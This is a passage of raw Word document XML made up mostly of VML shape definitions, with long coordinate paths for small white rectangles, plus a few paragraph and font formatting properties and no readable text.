,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11911,6537,11911,6537,11911,6537,11911,6537,11911,6537,11911,6537,11911,6537,11912,6537,11912,6537,11912,6537,11912,6537,11913,6537,11913,6537,11913,6537,11914,6537,11914,6537,11915,6537,11915,6537,11915,6537,11916,6537,11916,6537,11917,6537,11918,6537,11918,6537,11919,6537,11920,6537,11920,6537,11921,6537,11922,6537,11923,6537,11924,6537,11925,6537,11926,6537,11927,6537,11928,6537,11929,6537,11930,6537,11931,6537,11933,6537,11934,6537,11935,6537,11937,6537,11938,6537,11940,6537,11941,6537,11943,6537,11944,6537,11946,6537,11948,6537,11950,6537,11952,6537,11954,6537,11956,6537,11958,6537,11960,6537,11962,6537,11964,6537,11967,6537,11969,6537,11971,6537,11974,6537,11976,6537,11979,6537,11982,6537,11985,6537,11988,6537,11990,6537,11993,6537,11997,6537,12000,6537,12003,6537,12006,6537,12010,6537,12013,6537,12017,6537,12020,6537,12024,6537,12028,6537,12032,6537,12036,6537,12040,6537,12044,6537,12048,6537,12052,6537,12057,6537,12061,6537,12066,6537,12071,6537,12075,6537,12080,6537,12085,6537,12090,6537,12095,6537,12101,6537,12106,6537,12112,6537,12117,6537,12123,6537,12128,6537,12134,6537,12140,6537,12146,6537,12152,6537,12159,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6536,12165,6536,12165,6536,12165,6536,12165,6536,12165,6536,12165,6536,12165,6535,12165,6535,12165,6535,12165,6535,12165,6534,12165,6534,12165,6534,12165,6534,12165,6533,12165,6533,12165,6533,12165,6532,12165,6532,12165,6532,12165,6531,12165,6531,12165,6530,12165,6530,12165,6529,12165,6529,12165,6528,12165,6528,12165,6527,12165,6527,12165,6526,12165,6525,12165,6525,12165,6524,12165,6523,12165,6523,12165,6522,12165,6521,12165,6520,12165,6519,12165,6519,12165,6518,12165,6517,12165,6516,12165,6515,12165,6514,12165,6513,12165,6512,12165,6511,12165,6510,12165,6508,12165,6507,12165,6506,12165,6505,12165,6503,12165,6502,12165,6501,12165,6499,12165,6498,12165,6497,12165,6495,12165,6494,12165,6492,12165,6490,12165,6489,12165,6487,12165,6485,12165,6484,12165,6482,12165,6480,12165,6478,12165,6476,12165,6474,12165,6472,12165,6470,12165,6468,12165,6466,12165,6464,12165,6462,12165,6459,12165,6457,12165,6455,12165,6452,12165,6450,12165,6448,12165,6445,12165,6442,12165,6440,12165,6437,12165,6434,12165,6432,12165,6429,12165,6426,12165,6423,12165,6420,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12164,6417,12164,6417,12164,6417,12164,6417,12164,6417,12164,6417,12163,6417,12163,6417,12163,6417,12162,6417,12162,6417,12162,6417,12161,6417,12161,6417,12161,6417,12160,6417,12160,6417,12159,6417,12159,6417,12158,6417,12157,6417,12157,6417,12156,6417,12155,6417,12155,6417,12154,6417,12153,6417,12152,6417,12151,6417,12150,6417,12149,6417,12148,6417,12147,6417,12146,6417,12145,6417,12144,6417,12143,6417,12141,6417,12140,6417,12139,6417,12137,6417,12136,6417,12134,6417,12132,6417,12131,6417,12129,6417,12127,6417,12125,6417,12124,6417,12122,6417,12120,6417,12118,6417,12115,6417,12113,6417,12111,6417,12109,6417,12106,6417,12104,6417,12101,6417,12099,6417,12096,6417,12093,6417,12090,6417,12088,6417,12085,6417,12082,6417,12079,6417,12075,6417,12072,6417,12069,6417,12065,6417,12062,6417,12058,6417,12055,6417,12051,6417,12047,6417,12043,6417,12039,6417,12035,6417,12031,6417,12027,6417,12023,6417,12018,6417,12014,6417,12009,6417,12004,6417,12000,6417,11995,6417,11990,6417,11985,6417,11980,6417,11974,6417,11969,6417,11964,6417,11958,6417,11952,6417,11947,6417,11941,6417,11935,6417,11929,6417,11923,6417,11916,6417,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:355.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7110,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:7110;top:11890;width:130;height:270" coordorigin="7110,11890" coordsize="130,270" path="m7138,11910l7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7139,11910,7139,11910,7139,11910,7139,11910,7139,11910,7139,11910,7140,11910,7140,11910,7140,11910,7140,11910,7140,11910,7141,11910,7141,11910,7141,11910,7142,11910,7142,11910,7142,11910,7143,11910,7143,11910,7143,11910,7144,11910,7144,11910,7145,11910,7145,11910,7145,11910,7146,11910,7147,11910,7147,11910,7148,11910,7148,11910,7149,11910,7149,11910,7150,11910,7151,11910,7151,11910,7152,11910,7153,11910,7154,11910,7155,11910,7155,11910,7156,11910,7157,11910,7158,11910,7159,11910,7160,11910,7161,11910,7162,11910,7163,11910,7164,11910,7165,11910,7166,11910,7168,11910,7169,11910,7170,11910,7171,11910,7173,11910,7174,11910,7175,11910,7177,11910,7178,11910,7180,11910,7181,11910,7183,11910,7185,11910,7186,11910,7188,11910,7190,11910,7191,11910,7193,11910,7195,11910,7197,11910,7199,11910,7201,11910,7203,11910,7205,11910,7207,11910,7209,11910,7211,11910,7213,11910,7215,11910,7218,11910,7220,11910,7222,11910,7225,11910,7227,11910,7230,11910,7232,11910,7235,11910,7238,11910,7240,11910,7243,11910,7246,11910,7249,11910,7252,11910,7255,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11911,7258,11911,7258,11911,7258,11911,7258,11911,7258,11911,7258,11911,7258,11912,7258,11912,7258,11912,7258,11912,7258,11913,7258,11913,7258,11913,7258,11914,7258,11914,7258,11915,7258,11915,7258,11915,7258,11916,7258,11916,7258,11917,7258,11918,7258,11918,7258,11919,7258,11920,7258,11920,7258,11921,7258,11922,7258,11923,7258,11924,7258,11925,7258,11926,7258,11927,7258,11928,7258,11929,7258,11930,7258,11931,7258,11933,7258,11934,7258,11935,7258,11937,7258,11938,7258,11940,7258,11941,7258,11943,7258,11944,7258,11946,7258,11948,7258,11950,7258,11952,7258,11954,7258,11956,7258,11958,7258,11960,7258,11962,7258,11964,7258,11967,7258,11969,7258,11971,7258,11974,7258,11976,7258,11979,7258,11982,7258,11985,7258,11988,7258,11990,7258,11993,7258,11997,7258,12000,7258,12003,7258,12006,7258,12010,7258,12013,7258,12017,7258,12020,7258,12024,7258,12028,7258,12032,7258,12036,7258,12040,7258,12044,7258,12048,7258,12052,7258,12057,7258,12061,7258,12066,7258,12071,7258,12075,7258,12080,7258,12085,7258,12090,7258,12095,7258,12101,7258,12106,7258,12112,7258,12117,7258,12123,7258,12128,7258,12134,7258,12140,7258,12146,7258,12152,7258,12159,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7256,12165,7256,12165,7256,12165,7256,12165,7256,12165,7256,12165,7255,12165,7255,12165,7255,12165,7255,12165,7254,12165,7254,12165,7254,12165,7253,12165,7253,12165,7253,12165,7252,12165,7252,12165,7252,12165,7251,12165,7251,12165,7250,12165,7250,12165,7249,12165,7249,12165,7248,12165,7248,12165,7247,12165,7246,12165,7246,12165,7245,12165,7244,12165,7244,12165,7243,12165,7242,12165,7241,12165,7241,12165,7240,12165,7239,12165,7238,12165,7237,12165,7236,12165,7235,12165,7234,12165,7233,12165,7232,12165,7231,12165,7230,12165,7229,12165,7228,12165,7226,12165,7225,12165,7224,12165,7223,12165,7221,12165,7220,12165,7218,12165,7217,12165,7215,12165,7214,12165,7212,12165,7211,12165,7209,12165,7207,12165,7206,12165,7204,12165,7202,12165,7200,12165,7198,12165,7197,12165,7195,12165,7193,12165,7191,12165,7189,12165,7186,12165,7184,12165,7182,12165,7180,12165,7178,12165,7175,12165,7173,12165,7170,12165,7168,12165,7165,12165,7163,12165,7160,12165,7158,12165,7155,12165,7152,12165,7149,12165,7146,12165,7144,12165,7141,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12164,7138,12164,7138,12164,7138,12164,7138,12164,7138,12164,7138,12163,7138,12163,7138,12163,7138,12162,7138,12162,7138,12162,7138,12161,7138,12161,7138,12161,7138,12160,7138,12160,7138,12159,7138,12159,7138,12158,7138,12157,7138,12157,7138,12156,7138,12155,7138,12155,7138,12154,7138,12153,7138,12152,7138,12151,7138,12150,7138,12149,7138,12148,7138,12147,7138,12146,7138,12145,7138,12144,7138,12143,7138,12141,7138,12140,7138,12139,7138,12137,7138,12136,7138,12134,7138,12132,7138,12131,7138,12129,7138,12127,7138,12125,7138,12124,7138,12122,7138,12120,7138,12118,7138,12115,7138,12113,7138,12111,7138,12109,7138,12106,7138,12104,7138,12101,7138,12099,7138,12096,7138,12093,7138,12090,7138,12088,7138,12085,7138,12082,7138,12079,7138,12075,7138,12072,7138,12069,7138,12065,7138,12062,7138,12058,7138,12055,7138,12051,7138,12047,7138,12043,7138,12039,7138,12035,7138,12031,7138,12027,7138,12023,7138,12018,7138,12014,7138,12009,7138,12004,7138,12000,7138,11995,7138,11990,7138,11985,7138,11980,7138,11974,7138,11969,7138,11964,7138,11958,7138,11952,7138,11947,7138,11941,7138,11935,7138,11929,7138,11923,7138,11916,7138,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:608.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,12170" coordsize="130,250">
        <v:shape style="position:absolute;left:6390;top:12170;width:130;height:250" coordorigin="6390,12170" coordsize="130,250" path="m6402,12180l6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6404,12180,6404,12180,6404,12180,6404,12180,6404,12180,6405,12180,6405,12180,6405,12180,6405,12180,6406,12180,6406,12180,6406,12180,6406,12180,6407,12180,6407,12180,6408,12180,6408,12180,6408,12180,6409,12180,6409,12180,6410,12180,6410,12180,6411,12180,6411,12180,6412,12180,6412,12180,6413,12180,6413,12180,6414,12180,6415,12180,6415,12180,6416,12180,6417,12180,6418,12180,6418,12180,6419,12180,6420,12180,6421,12180,6422,12180,6423,12180,6424,12180,6425,12180,6426,12180,6427,12180,6428,12180,6429,12180,6430,12180,6431,12180,6432,12180,6433,12180,6435,12180,6436,12180,6437,12180,6439,12180,6440,12180,6442,12180,6443,12180,6444,12180,6446,12180,6448,12180,6449,12180,6451,12180,6452,12180,6454,12180,6456,12180,6458,12180,6460,12180,6461,12180,6463,12180,6465,12180,6467,12180,6469,12180,6471,12180,6473,12180,6476,12180,6478,12180,6480,12180,6482,12180,6485,12180,6487,12180,6490,12180,6492,12180,6494,12180,6497,12180,6500,12180,6502,12180,6505,12180,6508,12180,6511,12180,6513,12180,6516,12180,6519,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12181,6522,12181,6522,12181,6522,12181,6522,12181,6522,12181,6522,12181,6522,12182,6522,12182,6522,12182,6522,12182,6522,12183,6522,12183,6522,12183,6522,12183,6522,12184,6522,12184,6522,12185,6522,12185,6522,12186,6522,12186,6522,12187,6522,12187,6522,12188,6522,12188,6522,12189,6522,12190,6522,12191,6522,12191,6522,12192,6522,12193,6522,12194,6522,12195,6522,12196,6522,12197,6522,12198,6522,12199,6522,12200,6522,12201,6522,12203,6522,12204,6522,12205,6522,12207,6522,12208,6522,12210,6522,12211,6522,12213,6522,12214,6522,12216,6522,12218,6522,12220,6522,12222,6522,12224,6522,12226,6522,12228,6522,12230,6522,12232,6522,12234,6522,12237,6522,12239,6522,12241,6522,12244,6522,12247,6522,12249,6522,12252,6522,12255,6522,12258,6522,12261,6522,12264,6522,12267,6522,12270,6522,12273,6522,12276,6522,12280,6522,12283,6522,12287,6522,12291,6522,12294,6522,12298,6522,12302,6522,12306,6522,12310,6522,12314,6522,12318,6522,12323,6522,12327,6522,12332,6522,12336,6522,12341,6522,12346,6522,12350,6522,12355,6522,12360,6522,12366,6522,12371,6522,12376,6522,12382,6522,12387,6522,12393,6522,12399,6522,12404,6522,12410,6522,12416,6522,12423,6522,12429,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6521,12435,6521,12435,6521,12435,6521,12435,6521,12435,6521,12435,6521,12435,6520,12435,6520,12435,6520,12435,6520,12435,6519,12435,6519,12435,6519,12435,6519,12435,6518,12435,6518,12435,6518,12435,6517,12435,6517,12435,6517,12435,6516,12435,6516,12435,6515,12435,6515,12435,6514,12435,6514,12435,6513,12435,6513,12435,6512,12435,6512,12435,6511,12435,6510,12435,6510,12435,6509,12435,6508,12435,6508,12435,6507,12435,6506,12435,6505,12435,6504,12435,6504,12435,6503,12435,6502,12435,6501,12435,6500,12435,6499,12435,6498,12435,6497,12435,6496,12435,6495,12435,6493,12435,6492,12435,6491,12435,6490,12435,6488,12435,6487,12435,6486,12435,6484,12435,6483,12435,6482,12435,6480,12435,6479,12435,6477,12435,6475,12435,6474,12435,6472,12435,6470,12435,6469,12435,6467,12435,6465,12435,6463,12435,6461,12435,6459,12435,6457,12435,6455,12435,6453,12435,6451,12435,6449,12435,6447,12435,6444,12435,6442,12435,6440,12435,6437,12435,6435,12435,6433,12435,6430,12435,6427,12435,6425,12435,6422,12435,6419,12435,6417,12435,6414,12435,6411,12435,6408,12435,6405,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12434,6402,12434,6402,12434,6402,12434,6402,12434,6402,12433,6402,12433,6402,12433,6402,12433,6402,12432,6402,12432,6402,12432,6402,12431,6402,12431,6402,12430,6402,12430,6402,12429,6402,12429,6402,12428,6402,12428,6402,12427,6402,12426,6402,12426,6402,12425,6402,12424,6402,12423,6402,12422,6402,12421,6402,12421,6402,12420,6402,12419,6402,12417,6402,12416,6402,12415,6402,12414,6402,12413,6402,12411,6402,12410,6402,12409,6402,12407,6402,12406,6402,12404,6402,12403,6402,12401,6402,12399,6402,12397,6402,12396,6402,12394,6402,12392,6402,12390,6402,12388,6402,12386,6402,12383,6402,12381,6402,12379,6402,12376,6402,12374,6402,12371,6402,12369,6402,12366,6402,12363,6402,12361,6402,12358,6402,12355,6402,12352,6402,12349,6402,12346,6402,12342,6402,12339,6402,12336,6402,12332,6402,12329,6402,12325,6402,12321,6402,12317,6402,12313,6402,12310,6402,12305,6402,12301,6402,12297,6402,12293,6402,12288,6402,12284,6402,12279,6402,12275,6402,12270,6402,12265,6402,12260,6402,12255,6402,12250,6402,12245,6402,12239,6402,12234,6402,12228,6402,12223,6402,12217,6402,12211,6402,12205,6402,12199,6402,12193,6402,12187,6402,12180e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:626.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,12530" coordsize="130,250">
        <v:shape style="position:absolute;left:4710;top:12530;width:130;height:250" coordorigin="4710,12530" coordsize="130,250" path="m4736,12540l4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4738,12540,4738,12540,4738,12540,4738,12540,4738,12540,4739,12540,4739,12540,4739,12540,4739,12540,4739,12540,4740,12540,4740,12540,4740,12540,4741,12540,4741,12540,4741,12540,4742,12540,4742,12540,4742,12540,4743,12540,4743,12540,4744,12540,4744,12540,4745,12540,4745,12540,4746,12540,4746,12540,4747,12540,4748,12540,4748,12540,4749,12540,4750,12540,4750,12540,4751,12540,4752,12540,4753,12540,4753,12540,4754,12540,4755,12540,4756,12540,4757,12540,4758,12540,4759,12540,4760,12540,4761,12540,4762,12540,4763,12540,4764,12540,4765,12540,4766,12540,4768,12540,4769,12540,4770,12540,4772,12540,4773,12540,4774,12540,4776,12540,4777,12540,4779,12540,4780,12540,4782,12540,4783,12540,4785,12540,4787,12540,4788,12540,4790,12540,4792,12540,4794,12540,4796,12540,4797,12540,4799,12540,4801,12540,4803,12540,4806,12540,4808,12540,4810,12540,4812,12540,4814,12540,4817,12540,4819,12540,4821,12540,4824,12540,4826,12540,4829,12540,4831,12540,4834,12540,4836,12540,4839,12540,4842,12540,4845,12540,4848,12540,4850,12540,4853,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12541,4856,12541,4856,12541,4856,12541,4856,12541,4856,12541,4856,12541,4856,12541,4856,12541,4856,12542,4856,12542,4856,12542,4856,12542,4856,12542,4856,12543,4856,12543,4856,12543,4856,12544,4856,12544,4856,12544,4856,12545,4856,12545,4856,12546,4856,12546,4856,12547,4856,12547,4856,12548,4856,12549,4856,12549,4856,12550,4856,12551,4856,12552,4856,12552,4856,12553,4856,12554,4856,12555,4856,12556,4856,12557,4856,12558,4856,12559,4856,12560,4856,12562,4856,12563,4856,12564,4856,12566,4856,12567,4856,12568,4856,12570,4856,12571,4856,12573,4856,12575,4856,12576,4856,12578,4856,12580,4856,12582,4856,12584,4856,12586,4856,12588,4856,12590,4856,12592,4856,12595,4856,12597,4856,12599,4856,12602,4856,12604,4856,12607,4856,12609,4856,12612,4856,12615,4856,12618,4856,12621,4856,12624,4856,12627,4856,12630,4856,12633,4856,12637,4856,12640,4856,12643,4856,12647,4856,12651,4856,12654,4856,12658,4856,12662,4856,12666,4856,12670,4856,12674,4856,12678,4856,12683,4856,12687,4856,12692,4856,12696,4856,12701,4856,12706,4856,12711,4856,12716,4856,12721,4856,12726,4856,12731,4856,12736,4856,12742,4856,12747,4856,12753,4856,12759,4856,12765,4856,12771,4856,12777,4856,12783,4856,12789,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4855,12795,4855,12795,4855,12795,4855,12795,4855,12795,4855,12795,4855,12795,4854,12795,4854,12795,4854,12795,4854,12795,4853,12795,4853,12795,4853,12795,4853,12795,4852,12795,4852,12795,4852,12795,4851,12795,4851,12795,4850,12795,4850,12795,4850,12795,4849,12795,4849,12795,4848,12795,4848,12795,4847,12795,4846,12795,4846,12795,4845,12795,4845,12795,4844,12795,4843,12795,4843,12795,4842,12795,4841,12795,4840,12795,4839,12795,4839,12795,4838,12795,4837,12795,4836,12795,4835,12795,4834,12795,4833,12795,4832,12795,4831,12795,4830,12795,4829,12795,4828,12795,4826,12795,4825,12795,4824,12795,4823,12795,4821,12795,4820,12795,4819,12795,4817,12795,4816,12795,4814,12795,4813,12795,4811,12795,4810,12795,4808,12795,4806,12795,4805,12795,4803,12795,4801,12795,4799,12795,4797,12795,4795,12795,4793,12795,4791,12795,4789,12795,4787,12795,4785,12795,4783,12795,4781,12795,4779,12795,4776,12795,4774,12795,4772,12795,4769,12795,4767,12795,4764,12795,4762,12795,4759,12795,4756,12795,4754,12795,4751,12795,4748,12795,4745,12795,4742,12795,4739,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12794,4736,12794,4736,12794,4736,12794,4736,12794,4736,12793,4736,12793,4736,12793,4736,12792,4736,12792,4736,12792,4736,12791,4736,12791,4736,12790,4736,12790,4736,12789,4736,12789,4736,12788,4736,12788,4736,12787,4736,12786,4736,12786,4736,12785,4736,12784,4736,12783,4736,12783,4736,12782,4736,12781,4736,12780,4736,12779,4736,12778,4736,12777,4736,12775,4736,12774,4736,12773,4736,12772,4736,12770,4736,12769,4736,12767,4736,12766,4736,12764,4736,12763,4736,12761,4736,12759,4736,12758,4736,12756,4736,12754,4736,12752,4736,12750,4736,12748,4736,12746,4736,12744,4736,12741,4736,12739,4736,12737,4736,12734,4736,12732,4736,12729,4736,12726,4736,12724,4736,12721,4736,12718,4736,12715,4736,12712,4736,12709,4736,12706,4736,12702,4736,12699,4736,12696,4736,12692,4736,12689,4736,12685,4736,12681,4736,12678,4736,12674,4736,12670,4736,12666,4736,12661,4736,12657,4736,12653,4736,12649,4736,12644,4736,12639,4736,12635,4736,12630,4736,12625,4736,12620,4736,12615,4736,12610,4736,12605,4736,12599,4736,12594,4736,12588,4736,12583,4736,12577,4736,12571,4736,12565,4736,12559,4736,12553,4736,12547,4736,12540e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:626.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,12530" coordsize="130,250">
        <v:shape style="position:absolute;left:6390;top:12530;width:130;height:250" coordorigin="6390,12530" coordsize="130,250" path="m6417,12540l6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6419,12540,6419,12540,6419,12540,6419,12540,6419,12540,6420,12540,6420,12540,6420,12540,6420,12540,6421,12540,6421,12540,6421,12540,6421,12540,6422,12540,6422,12540,6423,12540,6423,12540,6423,12540,6424,12540,6424,12540,6425,12540,6425,12540,6426,12540,6426,12540,6427,12540,6427,12540,6428,12540,6428,12540,6429,12540,6430,12540,6430,12540,6431,12540,6432,12540,6433,12540,6433,12540,6434,12540,6435,12540,6436,12540,6437,12540,6438,12540,6439,12540,6440,12540,6441,12540,6442,12540,6443,12540,6444,12540,6445,12540,6446,12540,6447,12540,6449,12540,6450,12540,6451,12540,6452,12540,6454,12540,6455,12540,6457,12540,6458,12540,6459,12540,6461,12540,6463,12540,6464,12540,6466,12540,6467,12540,6469,12540,6471,12540,6473,12540,6475,12540,6476,12540,6478,12540,6480,12540,6482,12540,6484,12540,6486,12540,6488,12540,6491,12540,6493,12540,6495,12540,6497,12540,6500,12540,6502,12540,6505,12540,6507,12540,6509,12540,6512,12540,6515,12540,6517,12540,6520,12540,6523,12540,6526,12540,6528,12540,6531,12540,6534,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12541,6537,12541,6537,12541,6537,12541,6537,12541,6537,12541,6537,12541,6537,12541,6537,12541,6537,12542,6537,12542,6537,12542,6537,12542,6537,12542,6537,12543,6537,12543,6537,12543,6537,12544,6537,12544,6537,12544,6537,12545,6537,12545,6537,12546,6537,12546,6537,12547,6537,12547,6537,12548,6537,12549,6537,12549,6537,12550,6537,12551,6537,12552,6537,12552,6537,12553,6537,12554,6537,12555,6537,12556,6537,12557,6537,12558,6537,12559,6537,12560,6537,12562,6537,12563,6537,12564,6537,12566,6537,12567,6537,12568,6537,12570,6537,12571,6537,12573,6537,12575,6537,12576,6537,12578,6537,12580,6537,12582,6537,12584,6537,12586,6537,12588,6537,12590,6537,12592,6537,12595,6537,12597,6537,12599,6537,12602,6537,12604,6537,12607,6537,12609,6537,12612,6537,12615,6537,12618,6537,12621,6537,12624,6537,12627,6537,12630,6537,12633,6537,12637,6537,12640,6537,12643,6537,12647,6537,12651,6537,12654,6537,12658,6537,12662,6537,12666,6537,12670,6537,12674,6537,12678,6537,12683,6537,12687,6537,12692,6537,12696,6537,12701,6537,12706,6537,12711,6537,12716,6537,12721,6537,12726,6537,12731,6537,12736,6537,12742,6537,12747,6537,12753,6537,12759,6537,12765,6537,12771,6537,12777,6537,12783,6537,12789,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6536,12795,6536,12795,6536,12795,6536,12795,6536,12795,6536,12795,6536,12795,6535,12795,6535,12795,6535,12795,6535,12795,6534,12795,6534,12795,6534,12795,6534,12795,6533,12795,6533,12795,6533,12795,6532,12795,6532,12795,6532,12795,6531,12795,6531,12795,6530,12795,6530,12795,6529,12795,6529,12795,6528,12795,6528,12795,6527,12795,6527,12795,6526,12795,6525,12795,6525,12795,6524,12795,6523,12795,6523,12795,6522,12795,6521,12795,6520,12795,6519,12795,6519,12795,6518,12795,6517,12795,6516,12795,6515,12795,6514,12795,6513,12795,6512,12795,6511,12795,6510,12795,6508,12795,6507,12795,6506,12795,6505,12795,6503,12795,6502,12795,6501,12795,6499,12795,6498,12795,6497,12795,6495,12795,6494,12795,6492,12795,6490,12795,6489,12795,6487,12795,6485,12795,6484,12795,6482,12795,6480,12795,6478,12795,6476,12795,6474,12795,6472,12795,6470,12795,6468,12795,6466,12795,6464,12795,6462,12795,6459,12795,6457,12795,6455,12795,6452,12795,6450,12795,6448,12795,6445,12795,6442,12795,6440,12795,6437,12795,6434,12795,6432,12795,6429,12795,6426,12795,6423,12795,6420,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12795,6417,12794,6417,12794,6417,12794,6417,12794,6417,12794,6417,12793,6417,12793,6417,12793,6417,12792,6417,12792,6417,12792,6417,12791,6417,12791,6417,12790,6417,12790,6417,12789,6417,12789,6417,12788,6417,12788,6417,12787,6417,12786,6417,12786,6417,12785,6417,12784,6417,12783,6417,12783,6417,12782,6417,12781,6417,12780,6417,12779,6417,12778,6417,12777,6417,12775,6417,12774,6417,12773,6417,12772,6417,12770,6417,12769,6417,12767,6417,12766,6417,12764,6417,12763,6417,12761,6417,12759,6417,12758,6417,12756,6417,12754,6417,12752,6417,12750,6417,12748,6417,12746,6417,12744,6417,12741,6417,12739,6417,12737,6417,12734,6417,12732,6417,12729,6417,12726,6417,12724,6417,12721,6417,12718,6417,12715,6417,12712,6417,12709,6417,12706,6417,12702,6417,12699,6417,12696,6417,12692,6417,12689,6417,12685,6417,12681,6417,12678,6417,12674,6417,12670,6417,12666,6417,12661,6417,12657,6417,12653,6417,12649,6417,12644,6417,12639,6417,12635,6417,12630,6417,12625,6417,12620,6417,12615,6417,12610,6417,12605,6417,12599,6417,12594,6417,12588,6417,12583,6417,12577,6417,12571,6417,12565,6417,12559,6417,12553,6417,12547,6417,12540e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:681.600pt;width:467.400pt;height:40.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId31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173" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1606" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2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2"/>
        </w:rPr>
        <w:t> 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80053"/>
          <w:spacing w:val="3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3"/>
